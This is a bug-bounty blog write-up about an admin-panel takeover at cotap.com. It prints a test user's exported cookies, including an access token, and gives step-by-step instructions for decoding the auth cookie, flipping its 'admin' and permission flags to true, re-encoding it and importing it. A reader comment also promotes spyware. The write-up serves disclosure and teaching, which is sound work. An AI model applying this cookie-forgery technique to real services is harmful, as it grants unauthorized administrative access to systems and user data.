Buy Royal UI Officially! Contact Us Buy Now!
Home
BROWSER
BUGBOUNTY

Cotap Admin Panel Takeover

Dipak Kumar Das
Estimated read time: 5 min
Once I was invited to a Hackerone private program . So here is one Bug i have found in cotap

So lets start
When ever i got any new target i do a quick subdomain enumeration so for subdomain scaning you can use
some great tools like knock or This online tool 

so after a subdomain scan i got a subdomain admin.cotap.com
then i visited admin.cotap.com then it redirected me to app.cotap.com which is an normal user interface , so here no problem its ok

so now though how to get into the admin panel , Tried a lot but failed

so after few days i was testing it again and that time i am testing as normal user then i export the cookie and i found this
Here is the active user session cookie
[
{
"domain": ".cotap.com",
"expirationDate": 1504556226,
"hostOnly": false,
"httpOnly": false,
"name": "ga",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "GA1.2.1098904338.1441483504",
"id": 1
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_anonymous_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%227641cefa-af44-46b3-90e5-6b7df324bc86%22",
"id": 2
},
{
"domain": ".cotap.com",
"expirationDate": 1473020144,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_group_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "null",
"id": 3
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_user_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%22test%40armyspy.com%22",
"id": 4
},
{
"domain": ".cotap.com",
"expirationDate": 1756844163,
"hostOnly": false,
"httpOnly": false,
"name": "amplitude_idcotap.com",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "eyJkZXZpY2VJZCI6IjA4MWUwNjg0LTlmZWUtNDBmOC04OWZiLWVkZjFkMTI5NjJlZCIsInVzZXJJZCI6bnVsbCwib3B0T3V0IjpmYWxzZX0=",
"id": 5
},
{
"domain": ".cotap.com",
"expirationDate": 2072204226,
"hostOnly": false,
"httpOnly": false,
"name": "cotap:auth",
"path": "/",
"secure": true,
"session": false,
"storeId": "0",
"value": "JTdCJTIydGFsa2VyJTIyJTNBJTdCJTIyaWQlMjIlM0E0ODAzMzM5MiUyQyUyMmFkZHJlc3MlMjIlM0ElMjJ0ZXN0JTQwYXJteXNweS5jb20lMjIlMkMlMjJwZXJzb25hbF9hZGRyZXNzJTIyJTNBdHJ1ZSUyQyUyMnZlcmlmaWVkJTIyJTNBdHJ1ZSUyQyUyMmZpcnN0X25hbWUlMjIlM0ElMjJoZWxsbyUyMiUyQyUyMmxhc3RfbmFtZSUyMiUzQSUyMm1lJTIyJTJDJTIyYXZhdGFyX3VybCUyMiUzQW51bGwlMkMlMjJub3RpZmljYXRpb25fbWV0aG9kJTIyJTNBJTIyZW1haWwlMjIlMkMlMjJ1c2VybmFtZSUyMiUzQW51bGwlMkMlMjJ0aW1lc3RhbXAlMjIlM0ElMjIyMDE1LTA5LTA1VDAzJTNBNTMlM0EzMC4yMzVaJTIyJTJDJTIycmVnaXN0ZXJlZCUyMiUzQXRydWUlMkMlMjJwcmVtaXVtJTIyJTNBZmFsc2UlMkMlMjJhZG1pbiUyMiUzQWZhbHNlJTJDJTIycGVybWlzc2lvbnMlMjIlM0ElN0IlMjJkaXNhYmxlX2NvbnZlcnNhdGlvbl9zaGFyaW5nJTIyJTNBZmFsc2UlMkMlMjJyZW1vdmVfcGFydGljaXBhbnRzJTIyJTNBZmFsc2UlMkMlMjJmaWxlcyUyMiUzQXRydWUlMkMlMjJwcmVtaXVtX2ZpbGVzJTIyJTNBZmFsc2UlMkMlMjJyYXRpbmdfcmVtaW5kZXIlMjIlM0FmYWxzZSUyQyUyMnBsYWNlX3ZpZGVvX2NhbGxzJTIyJTNBZmFsc2UlN0QlMkMlMjJwaG9uZV9udW1iZXIlMjIlM0FudWxsJTdEJTJDJTIyYWRkcmVzcyUyMiUzQSUyMnRlc3QlNDBhcm15c3B5LmNvbSUyMiUyQyUyMnNjb3BlJTIyJTNBJTIyd2ViJTIyJTJDJTIyc3VwcG9ydGVkX3NjaGVtZXMlMjIlM0ElNUIlMjJjb2RlX21vZGUlMjIlNUQlMkMlMjJhY2Nlc3NfdG9rZW4lMjIlM0ElMjI4MzEyNmNjZTE2MzYwNDY3Y2M5YjJlNjI3ZThhYWRmMyUyMiUyQyUyMnN0YXRlJTIyJTNBJTIydmVyaWZpZWQlMjIlMkMlMjJzY2hlbWUlMjIlM0ElN0IlMjJ0eXBlJTIyJTNBJTIyY29kZV9tb2RlJTIyJTJDJTIyY29uZmlybV9hZGRyZXNzJTIyJTNBZmFsc2UlMkMlMjJyZXF1aXJlX3Byb2ZpbGUlMjIlM0FmYWxzZSU3RCUyQyUyMmNvZGUlMjIlM0ElMjIzMjI2JTIyJTJDJTIycHVibnViX2NoYW5uZWwlMjIlM0ElMjJlOTI2NTc0YzBmMDdlMzhhNWIwNGMzZjIxOGE4YTk4YzYzODAwNGEwNzA2NzYzOTc3MGVkNGMzYTk0ZTI5YzFlYzdkZjExZTgxNjJiNzVjMzNlZDg1OTdmYWQ2ZGEyNmUwYjExNDNlZDFhOWQxZTgzNjRiY2U3Nzg2OTJkN2Y0NyUyMiU3RA==",
"id": 6
},
{
"domain": "app.cotap.com",
"expirationDate": 1473020194,
"hostOnly": true,
"httpOnly": false,
"name": "mp7a46f06059cd77ff0cf1576eedb16eb3_mixpanel",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%7B%22distinct_id%22%3A%20%22test%40armyspy.com%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%2C%22mp_name_tag%22%3A%20%22test%40armyspy.com%22%2C%22id%22%3A%20%22test%40armyspy.com%22%2C%22%24email%22%3A%20%22test%40armyspy.com%22%7D",
"id": 7
},
{
"domain": "app.cotap.com",
"expirationDate": 1911844800,
"hostOnly": true,
"httpOnly": false,
"name": "pnctest",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1",
"id": 8
}
]

the cookie name " cotap:auth "  contains this

JTdCJTIydGFsa2VyJTIyJTNBJTdCJTIyaWQlMjIlM0E0ODAzMzM5MiUyQyUyMmFkZHJlc3MlMjIlM0ElMjJ0ZXN0JTQwYXJteXNweS5jb20lMjIlMkMlMjJwZXJzb25hbF9hZGRyZXNzJTIyJTNBdHJ1ZSUyQyUyMnZlcmlmaWVkJTIyJTNBdHJ1ZSUyQyUyMmZpcnN0X25hbWUlMjIlM0ElMjJoZWxsbyUyMiUyQyUyMmxhc3RfbmFtZSUyMiUzQSUyMm1lJTIyJTJDJTIyYXZhdGFyX3VybCUyMiUzQW51bGwlMkMlMjJub3RpZmljYXRpb25fbWV0aG9kJTIyJTNBJTIyZW1haWwlMjIlMkMlMjJ1c2VybmFtZSUyMiUzQW51bGwlMkMlMjJ0aW1lc3RhbXAlMjIlM0ElMjIyMDE1LTA5LTA1VDAzJTNBNTMlM0EzMC4yMzVaJTIyJTJDJTIycmVnaXN0ZXJlZCUyMiUzQXRydWUlMkMlMjJwcmVtaXVtJTIyJTNBZmFsc2UlMkMlMjJhZG1pbiUyMiUzQWZhbHNlJTJDJTIycGVybWlzc2lvbnMlMjIlM0ElN0IlMjJkaXNhYmxlX2NvbnZlcnNhdGlvbl9zaGFyaW5nJTIyJTNBZmFsc2UlMkMlMjJyZW1vdmVfcGFydGljaXBhbnRzJTIyJTNBZmFsc2UlMkMlMjJmaWxlcyUyMiUzQXRydWUlMkMlMjJwcmVtaXVtX2ZpbGVzJTIyJTNBZmFsc2UlMkMlMjJyYXRpbmdfcmVtaW5kZXIlMjIlM0FmYWxzZSUyQyUyMnBsYWNlX3ZpZGVvX2NhbGxzJTIyJTNBZmFsc2UlN0QlMkMlMjJwaG9uZV9udW1iZXIlMjIlM0FudWxsJTdEJTJDJTIyYWRkcmVzcyUyMiUzQSUyMnRlc3QlNDBhcm15c3B5LmNvbSUyMiUyQyUyMnNjb3BlJTIyJTNBJTIyd2ViJTIyJTJDJTIyc3VwcG9ydGVkX3NjaGVtZXMlMjIlM0ElNUIlMjJjb2RlX21vZGUlMjIlNUQlMkMlMjJhY2Nlc3NfdG9rZW4lMjIlM0ElMjI4MzEyNmNjZTE2MzYwNDY3Y2M5YjJlNjI3ZThhYWRmMyUyMiUyQyUyMnN0YXRlJTIyJTNBJTIydmVyaWZpZWQlMjIlMkMlMjJzY2hlbWUlMjIlM0ElN0IlMjJ0eXBlJTIyJTNBJTIyY29kZV9tb2RlJTIyJTJDJTIyY29uZmlybV9hZGRyZXNzJTIyJTNBZmFsc2UlMkMlMjJyZXF1aXJlX3Byb2ZpbGUlMjIlM0FmYWxzZSU3RCUyQyUyMmNvZGUlMjIlM0ElMjIzMjI2JTIyJTJDJTIycHVibnViX2NoYW5uZWwlMjIlM0ElMjJlOTI2NTc0YzBmMDdlMzhhNWIwNGMzZjIxOGE4YTk4YzYzODAwNGEwNzA2NzYzOTc3MGVkNGMzYTk0ZTI5YzFlYzdkZjExZTgxNjJiNzVjMzNlZDg1OTdmYWQ2ZGEyNmUwYjExNDNlZDFhOWQxZTgzNjRiY2U3Nzg2OTJkN2Y0NyUyMiU3RA==

So here you can guess its a Base64

so what i did here

Step 1: Make a Base64 Decode

%7B%22talker%22%3A%7B%22id%22%3A48033392%2C%22address%22%3A%22test%40armyspy.com%22%2C%22personal_address%22%3Atrue%2C%22verified%22%3Atrue%2C%22first_name%22%3A%22hello%22%2C%22last_name%22%3A%22me%22%2C%22avatar_url%22%3Anull%2C%22notification_method%22%3A%22email%22%2C%22username%22%3Anull%2C%22timestamp%22%3A%222015-09-05T03%3A53%3A30.235Z%22%2C%22registered%22%3Atrue%2C%22premium%22%3Afalse%2C%22admin%22%3Afalse%2C%22permissions%22%3A%7B%22disable_conversation_sharing%22%3Afalse%2C%22remove_participants%22%3Afalse%2C%22files%22%3Atrue%2C%22premium_files%22%3Afalse%2C%22rating_reminder%22%3Afalse%2C%22place_video_calls%22%3Afalse%7D%2C%22phone_number%22%3Anull%7D%2C%22address%22%3A%22test%40armyspy.com%22%2C%22scope%22%3A%22web%22%2C%22supported_schemes%22%3A%5B%22code_mode%22%5D%2C%22access_token%22%3A%2283126cce16360467cc9b2e627e8aadf3%22%2C%22state%22%3A%22verified%22%2C%22scheme%22%3A%7B%22type%22%3A%22code_mode%22%2C%22confirm_address%22%3Afalse%2C%22require_profile%22%3Afalse%7D%2C%22code%22%3A%223226%22%2C%22pubnub_channel%22%3A%22e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47%22%7D
Step 2: Make a Url decode

{"talker":{"id":48033392,"address":"test@armyspy.com","personal_address":true,"verified":true,"first_name":"hello","last_name":"me","avatar_url":null,"notification_method":"email","username":null,"timestamp":"2015-09-05T03:53:30.235Z","registered":true,"premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false},"phone_number":null},"address":"test@armyspy.com","scope":"web","supported_schemes":["code_mode"],"access_token":"83126cce16360467cc9b2e627e8aadf3","state":"verified","scheme":{"type":"code_mode","confirm_address":false,"require_profile":false},"code":"3226","pubnub_channel":"e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47"}
Step 3: change all value false to true
premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false}
(in those parameters change false to true )

Step 4: Now after changing false to true make a url encode and then a Base64 encode and replace the old value of cotap:auth with new value and then import the cookie to normal user interface app.cotap.com and visited admin.cotap.com

And Finally i logged in as admin






Poc Images:



Thanks

Suggestion and Feedback are welcome

  




Previous
Next

Read Also: Cotap Admin Panel Takeover

#BROWSER #BUGBOUNTY #COOKIE STEALING

6 comments

  1. second ago
    Nice one..
    1. second ago
      Thq bro :)
  2. second ago
    Nice finding..How many reward you got with this bug.
    1. second ago
      sorry Its private
  3. second ago
    nice catch (y)
  4. second ago
    Take a look at thetruthspy to understand how great to spy on somebody.
Post a Comment
  • A-
  • A+

© 2025ADDICTIVE HACKERS. All rights reserved.

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.